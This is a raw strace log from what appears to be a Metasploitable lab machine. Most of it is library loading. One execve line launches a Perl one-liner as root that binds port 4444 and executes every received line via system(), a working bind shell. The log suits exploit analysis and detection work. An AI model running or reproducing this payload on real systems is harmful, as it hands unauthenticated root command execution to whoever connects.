10032 07:31:01.201296 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10032 07:31:01.201429 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10032 07:31:01.201448 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d4d000

10032 07:31:01.201461 mmap2(0xb7d56000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d56000

10032 07:31:01.201479 close(1)          = 0

10032 07:31:01.201502 munmap(0xb7f08000, 29913) = 0

10032 07:31:01.201521 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10032 07:31:01.201536 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10032 07:31:01.201549 _llseek(1, 0, [0], SEEK_CUR) = 0

10032 07:31:01.201562 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10032 07:31:01.201579 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f0f000

10032 07:31:01.201590 _llseek(1, 1624, [1624], SEEK_SET) = 0

10032 07:31:01.201606 munmap(0xb7f0f000, 1624) = 0

10032 07:31:01.201617 close(1)          = 0

10032 07:31:01.201650 getpgrp()         = 3831

10032 07:31:01.201661 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10032 07:31:01.201677 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10032 07:31:01.201694 brk(0x8101000)    = 0x8101000

10032 07:31:01.201728 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10032 07:31:01.201744 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10032 07:31:01.201759 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10032 07:31:01.201816 brk(0x8102000)    = 0x8102000

10032 07:31:01.201910 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10032 07:31:01.201933 stat64("/sbin/AB", 0xbfd33388) = -1 ENOENT (No such file or directory)

10032 07:31:01.201948 stat64("/bin/AB", 0xbfd33388) = -1 ENOENT (No such file or directory)

10032 07:31:01.201961 stat64("/usr/sbin/AB", 0xbfd33388) = -1 ENOENT (No such file or directory)

10032 07:31:01.201987 stat64("/usr/bin/AB", 0xbfd33388) = -1 ENOENT (No such file or directory)

10032 07:31:01.202010 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10032 07:31:01.202045 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d836f8) = 10033

10033 07:31:01.202149 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10033 07:31:01.202177 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10033 07:31:01.202206 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10033 07:31:01.202219 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10033 07:31:01.202249 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10033 07:31:01.202266 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10033 07:31:01.202279 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10033 07:31:01.202449 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10033 07:31:01.202468 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10033 07:31:01.202564 exit_group(127)   = ?

4519  07:31:01.223879 waitpid(10032,  <unfinished ...>

10032 07:31:01.223879 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10032 07:31:01.223879 --- SIGCHLD (Child exited) @ 0 (0) ---

10032 07:31:01.223895 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10033

10032 07:31:01.223915 waitpid(-1, 0xbfd33008, WNOHANG) = -1 ECHILD (No child processes)

10032 07:31:01.223926 sigreturn()       = ? (mask now [])

10032 07:31:01.223950 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10032 07:31:01.223966 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10032 07:31:01.223977 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10032 07:31:01.223989 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10032 07:31:01.224008 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10032 07:31:01.224020 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10032 07:31:01.224058 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10032 07:31:01.224079 stat64("/sbin/perl", 0xbfd333b8) = -1 ENOENT (No such file or directory)

10032 07:31:01.224091 stat64("/bin/perl", 0xbfd333b8) = -1 ENOENT (No such file or directory)

10032 07:31:01.224103 stat64("/usr/sbin/perl", 0xbfd333b8) = -1 ENOENT (No such file or directory)

10032 07:31:01.224115 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10032 07:31:01.224133 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10032 07:31:01.224159 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10032 07:31:01.224174 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d836f8) = 10034

10034 07:31:01.224263 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10034 07:31:01.224281 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10034 07:31:01.224309 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10034 07:31:01.224321 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10034 07:31:01.224336 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10034 07:31:01.224352 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10034 07:31:01.224365 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10034 07:31:01.224401 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10034 07:31:01.224492 brk(0)            = 0x8153000

10034 07:31:01.224513 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10034 07:31:01.224529 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7efd000

10034 07:31:01.224545 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10034 07:31:01.224563 open("/etc/ld.so.cache", O_RDONLY) = 1

10034 07:31:01.224576 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10034 07:31:01.224593 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ef5000

10034 07:31:01.224603 close(1)          = 0

10034 07:31:01.224614 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10034 07:31:01.224630 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10034 07:31:01.224650 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10034 07:31:01.224792 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10034 07:31:01.224811 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef1000

10034 07:31:01.224824 mmap2(0xb7ef3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ef3000

10034 07:31:01.224840 close(1)          = 0

10034 07:31:01.224852 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10034 07:31:01.224866 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10034 07:31:01.224881 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10034 07:31:01.224969 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10034 07:31:01.224986 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ecc000

10034 07:31:01.224997 mmap2(0xb7eef000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7eef000

10034 07:31:01.225013 close(1)          = 0

10034 07:31:01.225025 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10034 07:31:01.225039 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10034 07:31:01.225053 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10034 07:31:01.225143 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10034 07:31:01.225160 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ecb000

10034 07:31:01.225173 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eb3000

10034 07:31:01.225184 mmap2(0xb7ec7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ec7000

10034 07:31:01.225198 mmap2(0xb7ec9000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec9000

10034 07:31:01.225224 close(1)          = 0

10034 07:31:01.225259 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10034 07:31:01.225274 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10034 07:31:01.225302 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10034 07:31:01.225392 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10034 07:31:01.225410 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d64000

10034 07:31:01.225421 mmap2(0xb7ead000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ead000

10034 07:31:01.225435 mmap2(0xb7eb0000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eb0000

10034 07:31:01.225449 close(1)          = 0

10034 07:31:01.225461 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10034 07:31:01.225474 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10034 07:31:01.225489 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10034 07:31:01.225582 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10034 07:31:01.225599 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d32000

10034 07:31:01.225610 mmap2(0xb7d3b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d3b000

10034 07:31:01.225624 mmap2(0xb7d3d000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d3d000

10034 07:31:01.225638 close(1)          = 0

10034 07:31:01.225661 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d31000

10034 07:31:01.225674 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d318c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10034 07:31:01.225803 mprotect(0xb7ead000, 4096, PROT_READ) = 0

10034 07:31:01.225849 munmap(0xb7ef5000, 29913) = 0

10034 07:31:01.225862 set_tid_address(0xb7d31908) = 10034

10034 07:31:01.225871 set_robust_list(0xb7d31910, 0xc) = 0

10034 07:31:01.225881 futex(0xbf8a6540, 0x81 /* FUTEX_??? */, 1) = 0

10034 07:31:01.225896 rt_sigaction(SIGRTMIN, {0xb7eb72c0, [], SA_SIGINFO}, NULL, 8) = 0

10034 07:31:01.225909 rt_sigaction(SIGRT_1, {0xb7eb7340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10034 07:31:01.225922 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10034 07:31:01.225936 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10034 07:31:01.225955 uname({sys="Linux", node="metasploitable", ...}) = 0

10034 07:31:01.226004 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10034 07:31:01.226051 brk(0)            = 0x8153000

10034 07:31:01.226061 brk(0x8174000)    = 0x8174000

10034 07:31:01.226106 getuid32()        = 0

10034 07:31:01.226116 geteuid32()       = 0

10034 07:31:01.226125 getgid32()        = 0

10034 07:31:01.226134 getegid32()       = 0

10034 07:31:01.226172 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d10000

10034 07:31:01.226198 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10034 07:31:01.226256 read(1, "\362}-\0", 4) = 4

10034 07:31:01.226284 close(1)          = 0

10034 07:31:01.226302 time(NULL)        = 1495625461

10034 07:31:01.226342 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbf8a6210) = -1 ENOENT (No such file or directory)

10034 07:31:01.226360 stat64("/usr/local/lib/site_perl/5.8.8", 0xbf8a6210) = -1 ENOENT (No such file or directory)

10034 07:31:01.226373 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbf8a6210) = -1 ENOENT (No such file or directory)

10034 07:31:01.226389 stat64("/usr/local/lib/perl/5.8.7", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226401 stat64("/usr/local/share/perl/5.8.7", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226413 stat64("/usr/local/lib/perl/5.8.6", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226425 stat64("/usr/local/share/perl/5.8.6", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226437 stat64("/usr/local/lib/perl/5.8.4", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226448 stat64("/usr/local/share/perl/5.8.4", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226460 stat64("/usr/local/lib/perl/5.8.3", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226472 stat64("/usr/local/share/perl/5.8.3", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226483 stat64("/usr/local/lib/perl/5.8.2", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226495 stat64("/usr/local/share/perl/5.8.2", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226507 stat64("/usr/local/lib/perl/5.8.1", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226518 stat64("/usr/local/share/perl/5.8.1", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226530 stat64("/usr/local/lib/perl/5.8.0", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226545 stat64("/usr/local/share/perl/5.8.0", 0xbf8a6350) = -1 ENOENT (No such file or directory)

10034 07:31:01.226568 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8a6048) = -1 ENOTTY (Inappropriate ioctl for device)

10034 07:31:01.226582 _llseek(0, 0, [0], SEEK_CUR) = 0

10034 07:31:01.226594 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8a6048) = -1 EBADF (Bad file descriptor)

10034 07:31:01.226605 _llseek(1, 0, 0xbf8a6090, SEEK_CUR) = -1 EBADF (Bad file descriptor)

10034 07:31:01.226615 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8a6048) = -1 EINVAL (Invalid argument)

10034 07:31:01.226626 _llseek(2, 0, 0xbf8a6090, SEEK_CUR) = -1 ESPIPE (Illegal seek)

10034 07:31:01.226636 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

10034 07:31:01.226649 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8a6108) = -1 ENOTTY (Inappropriate ioctl for device)

10034 07:31:01.226659 _llseek(1, 0, [0], SEEK_CUR) = 0

10034 07:31:01.226670 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

10034 07:31:01.226682 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

10034 07:31:01.226714 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

10034 07:31:01.226806 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

10034 07:31:01.226855 getppid()         = 10032

10034 07:31:01.226916 stat64("/etc/perl/IO.pmc", 0xbf8a5dfc) = -1 ENOENT (No such file or directory)

10034 07:31:01.226930 stat64("/etc/perl/IO.pm", 0xbf8a5d0c) = -1 ENOENT (No such file or directory)

10034 07:31:01.226943 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbf8a5dfc) = -1 ENOENT (No such file or directory)

10034 07:31:01.226956 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbf8a5d0c) = -1 ENOENT (No such file or directory)

